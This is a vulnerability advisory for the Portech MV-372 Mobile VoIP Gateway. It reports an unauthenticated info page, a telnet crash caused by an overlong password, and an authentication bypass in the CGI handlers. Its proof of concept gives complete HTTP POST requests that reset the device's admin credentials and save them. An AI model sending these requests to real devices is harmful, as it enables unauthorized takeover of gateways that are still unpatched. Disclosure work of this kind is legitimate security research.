Portech MV-372 Mobile VoIP Multiple Vulnerabilities 1. Description Multiple vulnerabilities have been found in Portech MV-372 Mobile VoIP Gateway which allows an attacker to compromise the device and/or initiate a denial of service attack against it�s telnet service. The �Device details� section contains information about the affected system. Previous and future versions might be also vulnerable (not tested). The vendor has been notified and aware of the issue but from their reply it seems we will have to wait for a hotfix/patch for a while. 2. Device details Mobile VoIP2 v9.092 Model Type: MV-372 Module Description: GSM:850/900/1800/1900MHz (SIM3x0) Firmware Version: Mon Sep 6 13:11:30 2010. Codec Version: Fri Mar 20 17:13:45 2009. Contact Address: 150, Shiang-Shung N.Road., Taichung, Taiwan, R.O.C. Tel: 886-4-23058000 Fax: 886-4-23022596 E-Mail: sales@portech.com.tw Web Site: http://www.portech.com.tw. 3. Information disclosure It is possible to access http://<device address>/info.htm without authentication. This page reveals information about the device like model type, module description, firmware and codec versions. 4. Telnet service remote denial of service vulneraility It is possible to initiate a denial service attack against the telnet service without authentication by providing a very long password (e.g.: > 5000 chars) at authentication. No valid username required. As a result of the attack the telnet service crashes and will be unavailable until the device is restarted. 5. Web Administration authentication bypass vulnerability 5.1 Description An authetication bypass vulnerability exists in the web interface which allows an attacker to modify the configuration of the device without providing a valid username and password. After a successful authentication we can see that our browser got no cookie(s) from the device. After restarting the browser, deleting all stored information or using private browsing we can still access the administrative pages. When we change our IP address these pages are no longer accessible and we are asked to log in. So, the device stores our IP address and uses it as a session identifier. However this is a weakness, just like that the application uses http protocol instead of https for authentication it also fails to properly validate the user session. The files with �.htm� extension are responsible for user interaction and displaying configuration settings and the application is using CGI to handle requested tasks like configuration-, username and password changes. While the �.htm� pages verify our IP address, the CGI files not so calling these files directly with the proper arguments will result in the execution of the requested action without any authentication. 5.2 Proof of concept To change the username and password of the device without authentication send the following query to the device: POST http://<device address>/change.cgi HTTP/1.1 Host: <device address> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7 Connection: keep-alive Referer: http://192.168.0.100/change.htm Content-Type: application/x-www-form-urlencoded Content-Length: 50 Nuser=admin&Npass=admin&Nrpass=admin&submit=Submit The query above will change the actual username and password both to admin. To apply the changes we have to save our configuration which can be done with the query below. After executing the query the device restarts and we can log in with the username �admin� and password �admin�. POST http://<device address>/save.cgi Host: <device address> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7 Connection: keep-alive Referer: http://192.168.0.100/save.htm Content-Type: application/x-www-form-urlencoded Content-Length: 11 submit=Save All other CGIs are also vulnerable. Regards, Zsolt Imre